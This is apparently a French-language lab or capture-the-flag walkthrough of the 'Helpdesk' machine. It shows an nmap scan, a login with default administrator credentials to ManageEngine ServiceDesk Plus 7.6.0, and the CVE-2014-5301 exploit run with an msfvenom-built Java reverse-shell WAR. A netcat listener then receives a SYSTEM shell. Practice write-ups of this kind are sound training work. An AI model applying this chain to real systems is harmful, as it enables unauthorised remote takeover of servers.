Helpdesk

ManageEngine

• Nom machine : Helpdesk

• Difficulté : Facile

• OS : Windows

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 03:57 EDT
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 76.42% done; ETC: 03:59 (0:00:29 remaining)
Nmap scan report for 192.168.212.43
Host is up (0.033s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-server-header: Apache-Coyote/1.1
|_http-title: ManageEngine ServiceDesk Plus
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
| smb2-time: 
|   date: 2024-07-24T07:59:57
|_  start_date: 2024-07-24T07:57:00
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: HELPDESK
|   NetBIOS computer name: HELPDESK\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-07-24T00:59:57-07:00
| smb2-security-mode: 
|   2:0:2: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: HELPDESK, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:f3:30 (VMware)
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.53 seconds

HTTP (8080) : Apache Tomcat/Coyote JSP engine 1.1

ManageEngine ServiceDesk Plus | 7.6.0

Une recherche google nous permet de trouver des identifiants par défauts. administrator:administrator fonctionne.

Nous allons chercher un exploit correspondant à cette version de ManageEngine :

exploits/CVE-2014-5301.py at master · PeterSufliarsky/exploitsGitHub

Accès initial

ManageEngine Exploit

Nous allons copier l'exploit sur le repo précédent, créer un reverse shell .war et exécuter l'exploit.

┌──(kali㉿kali)-[~]
└─$ msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.217 LPORT=4444 -f war > shell.war
Payload size: 12808 bytes
Final size of war file: 12808 bytes

┌──(kali㉿kali)-[~]
└─$ python exploit.py 192.168.212.43 8080 administrator administrator shell.war
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.7) or chardet (5.2.0)/charset_normalizer (2.0.9) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
Trying http://192.168.212.43:8080/4EXEqNov111Qqug9BApdBJ4yOUAkdBIy/xpiguygtw/gPIquvKX8AFoGmtp
Trying http://192.168.212.43:8080/4EXEqNov111Qqug9BApdBJ4yOUAkdBIy/xpiguygtw/uDfRC1k6eYAREORM
Trying http://192.168.212.43:8080/4EXEqNov111Qqug9BApdBJ4yOUAkdBIy/xpiguygtw/EO5c4l6t6Z2NlwfX

Lancer avant exploit :

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.212.43] 49182
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\ManageEngine\ServiceDesk\bin>whoami
whoami
nt authority\system
C:\ManageEngine\ServiceDesk\bin>cd /users/administrator/desktop
C:\Users\Administrator\Desktop>type proof.txt

Nous sommes directement nt authority\system !